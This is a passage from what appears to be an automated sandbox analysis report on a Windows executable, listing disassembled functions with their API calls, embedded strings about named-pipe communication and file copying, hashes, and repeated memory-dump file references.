                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                    • String ID: CommBridge$Inside initCommBridge, creating pipe %s$OOBEUtils$Pipe already initialized.$Pipe name is empty.$Wrong pipe context passed %i.$\\.\pipe\
                                                                                                                                                                                                                                                                    • API String ID: 2978645861-1085201787
                                                                                                                                                                                                                                                                    • Opcode ID: 2741faf5fde62311bba358750df085c702bd52d97c66e27c1744663fa93f332a
                                                                                                                                                                                                                                                                    • Instruction ID: aaa71bcc0c1ad3f749e7ec319ae41c39833817b2d272478ea5ed4507fdbc246a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2741faf5fde62311bba358750df085c702bd52d97c66e27c1744663fa93f332a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CA10134700300ABDB24DF66DC9AF9A77A8AB05701F14056FE905972D1DB78F990CBAE
                                                                                                                                                                                                                                                                    Function 004274E0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 427fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,A11C6AE6,?,00000000,?,?,?,00000000,0049994D,000000FF,?,00406D2F), ref: 0042751A
                                                                                                                                                                                                                                                                      • Part of subcall function 004270D0: PathRemoveFileSpecW.SHLWAPI(00000000,?,?,?,?,?,?,00000000,0049994D,000000FF), ref: 0042714C
                                                                                                                                                                                                                                                                      • Part of subcall function 00427260: PathFileExistsW.SHLWAPI(?,?,0040653E), ref: 0042726E
                                                                                                                                                                                                                                                                      • Part of subcall function 00427260: PathIsDirectoryW.SHLWAPI(?), ref: 00427283
                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000000,0049994D,000000FF), ref: 004275CB
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,0049994D,000000FF), ref: 004275E9
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,0049994D,000000FF), ref: 00427637
                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000,0049994D,000000FF), ref: 00427678
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$Path$ErrorExistsLast$AttributesCopyDirectoryRemoveSpec
                                                                                                                                                                                                                                                                    • String ID: Failed to copy file at the destination:'%s'. LastError: %d$FileUtils$OOBEUtils$Source file does not exist in CopyFileFromSourceToDestination
                                                                                                                                                                                                                                                                    • API String ID: 3678581443-2441349454
                                                                                                                                                                                                                                                                    • Opcode ID: 3b2b4e70207e77957e346cfaaefa40b7f30fec250b144c30194b88bdfa61c5ea
                                                                                                                                                                                                                                                                    • Instruction ID: 304be064ac5706b44c2d59a599f2d95f36f10b52853653852536ae88b2003d00
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b2b4e70207e77957e346cfaaefa40b7f30fec250b144c30194b88bdfa61c5ea
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAE1F471F002249BCB14DF69ED85BAEB7B5FB45710F50422EE411A7390DB38AD41CBA9
                                                                                                                                                                                                                                                                    Function 0041F360 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 146filesleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0041F38A
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0041F39F
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?,?,?,00000000,?,?,?), ref: 0041F3B6
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000000,?,?,?), ref: 0041F3CC
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0041F3D6
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite$Sleep
                                                                                                                                                                                                                                                                    • String ID: CommBridge$Number of retries to write to pipe exhausted with last error = %lu. Aborting write on pipe %p$OOBEUtils$Write failed or else (No of bytes written > data). Aborting write on pipe %p , errno: %lu
                                                                                                                                                                                                                                                                    • API String ID: 2338600601-2345992799
                                                                                                                                                                                                                                                                    • Opcode ID: b8e0a7f11eae0cb03ddd70be310acbc4cd459f475ee6759fc557cd37cf45340b
                                                                                                                                                                                                                                                                    • Instruction ID: bbdbd7131a9a05eaf625d8743bffc745cebe138b644272fe07d0d675cb0cef45
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8e0a7f11eae0cb03ddd70be310acbc4cd459f475ee6759fc557cd37cf45340b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13411635B00208BBDB10DFA69C42BBF7B68EB55721F1001BBF815A32C0DA746D4087A8
                                                                                                                                                                                                                                                                    Function 004163F0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 155COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,?,00000000,00404D5E,?), ref: 00416418
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000001,00000000,00000000), ref: 004164B4
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004164CB
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041651E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                                    • String ID: Error allocating memory while converting Native string to UTF8 string$Failed to convert WideCharToMultiByte. ErrorCode::%d$OOBEUtils$StringUtils
                                                                                                                                                                                                                                                                    • API String ID: 203985260-2236274340
                                                                                                                                                                                                                                                                    • Opcode ID: e39f2a51ba932da9826a003946e3c0e9b08f0d17437669bc90833129a53970bc
                                                                                                                                                                                                                                                                    • Instruction ID: 716146f1c0389004c4db2de1f4adde63d4e0a6c81021537d3ce57664b142a41d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e39f2a51ba932da9826a003946e3c0e9b08f0d17437669bc90833129a53970bc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28417B3578031477DA20AF1AAC47FEA7794EB42B21F2400BBFD09632D0D9696D4487AD
                                                                                                                                                                                                                                                                    Function 00403C90 Relevance: 13.6, APIs: 2, Strings: 7, Instructions: 137sleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • Success:Initializing Connection Channel with Service with pipename: %s, xrefs: 00403D73
                                                                                                                                                                                                                                                                    • Successfully initiated communication, xrefs: 00403DAA
                                                                                                                                                                                                                                                                    • Communication is open on the other pipe. Closing the static guid and re-opening for new clients..., xrefs: 00403DF4
                                                                                                                                                                                                                                                                    • Failed to create the connection channel, xrefs: 00403D34
                                                                                                                                                                                                                                                                    • Failed to initiate communication, xrefs: 00403DCB
                                                                                                                                                                                                                                                                    • Initializing1 Connection Channel with Service with pipename: %s, xrefs: 00403CD0
                                                                                                                                                                                                                                                                    • Problem initializing Connection Channel. Quitting., xrefs: 00403D11
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                                                                    • String ID: Communication is open on the other pipe. Closing the static guid and re-opening for new clients...$Failed to create the connection channel$Failed to initiate communication$Initializing1 Connection Channel with Service with pipename: %s$Problem initializing Connection Channel. Quitting.$Success:Initializing Connection Channel with Service with pipename: %s$Successfully initiated communication
                                                                                                                                                                                                                                                                    • API String ID: 3472027048-2173017273
                                                                                                                                                                                                                                                                    • Opcode ID: 6df400194c0d2eafb8ad463674300954c48552a7f74c4dd405dff45e14274271
                                                                                                                                                                                                                                                                    • Instruction ID: 5187b662ea0dd10bef7ca44164715a625855074a8d72d76878ed54e6067e5788
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6df400194c0d2eafb8ad463674300954c48552a7f74c4dd405dff45e14274271
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9141F170600200EFCB10DF19DC89B5A7BA8AF49705F1440BAE909BB3D1CB78ED44CBA9
                                                                                                                                                                                                                                                                    Function 00418B10 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 330COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00418B88
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00418BAF
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00418C74
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00418C8E
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00418D23
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00418D30
                                                                                                                                                                                                                                                                      • Part of subcall function 0046877A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00468786
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$LockitLockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                                    • API String ID: 1871079455-1405518554
                                                                                                                                                                                                                                                                    • Opcode ID: c6cdc14bd338eddc53a98ba7adfe9d068b301496e6a84cf03d0ab39cc8f10731
                                                                                                                                                                                                                                                                    • Instruction ID: 2b18787ee60dced21a1ee80d710d234eacb2e1acb53e15705c8ae09ecf607236
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6cdc14bd338eddc53a98ba7adfe9d068b301496e6a84cf03d0ab39cc8f10731
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD16FB1E002189FDB00DFA5C984BDEBBB5BF58314F14406EE805A7391EB78AD45CB99
                                                                                                                                                                                                                                                                    Function 004013E0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 295COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004013E5
                                                                                                                                                                                                                                                                      • Part of subcall function 0046873A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00468746
                                                                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00401519
